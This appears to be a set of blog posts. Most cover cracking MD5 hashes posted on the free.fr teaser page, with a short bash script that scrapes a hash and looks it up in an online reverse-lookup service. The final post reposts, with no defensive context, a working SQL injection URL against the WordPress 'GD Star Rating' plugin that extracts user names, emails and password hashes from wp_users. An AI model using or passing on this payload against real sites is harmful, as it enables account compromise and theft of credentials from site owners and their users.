Thanks to @martin_u from Rue89, he just found on webarchive.org that the awaited live.free.fr website was … a p0rn site.

http://web.archive.org/web/20011104050024/http://www.live.free.fr/

No image are available we would have like to see what kind of p0rn site it was (hard, soft, SM maybe :p)
If someone found the old images …

 

, ,

Today the free.fr staff updated his ascii art space chip (at http://live.free.fr) with the following hash :

df73b956808cd23d30c76725215c9e0e

Atm, this hash has not yet been broken. Will you be the one to find it ?
Maybe it is the startup date of the Free Mobile offer ?

A few hours later, the hash was updated to:

efb7929e6a5b7dcc6ebb79aa3c45af13

This one was quickly cracked: it is corresponding to the checksum for the string jesaispas.

You may also find the following hash on http://www.free.fr/adsl

901b3221b8a74073b6a76371171b69f0

Which was cracked as well: launchpad

We have been informed of a hash that has been Twitted but we can’t confirm that it comes from Free:

e84f1fc5c9fdea09f8f4a1ae2adde8a4

It was cracked a few minutes ago by one of our readers: call3179
Thanks to olahaye74!

You may also be interested into our other post about monitoring the checksum on http://live.free.fr.

EDIT:
We are still trying to crack the first hash. We chosen to generate all dates matching the XX/XX/XXXX format and then use some rainbow tables. Any other idea ?
We are now really close to breaking the hash. Our hashing machines are running for 3 complete hours, and we can say the hash is at least 13 characters long.
Stay tuned!

If you wanna retrieve the md5 hash, here is the script (not from us, I found it on gist.github.com):

#!/bin/bash
# troll: If you don't have bash, go get a real OS.

curl -s "http://md5.noisette.ch/md5.php?hash=$(curl -s http://live.free.fr | gunzip | tail -n 36 | head -n 32 | grep '[a-f0-9]' -o | xargs echo -n | sed 's/ //g')" | grep '<string>' | sed 's/^.*\[CDATA\[\(.*\)\]\].*$/\1/'

, , ,

Served as found on the interweb :

WordPress « wp star rating » plugin SQL injection

http://yourwordpress/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0×535242,1,1,co

ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0×20,2000)),1,2000),0x223b7d),1,1,1+limit+1

, , ,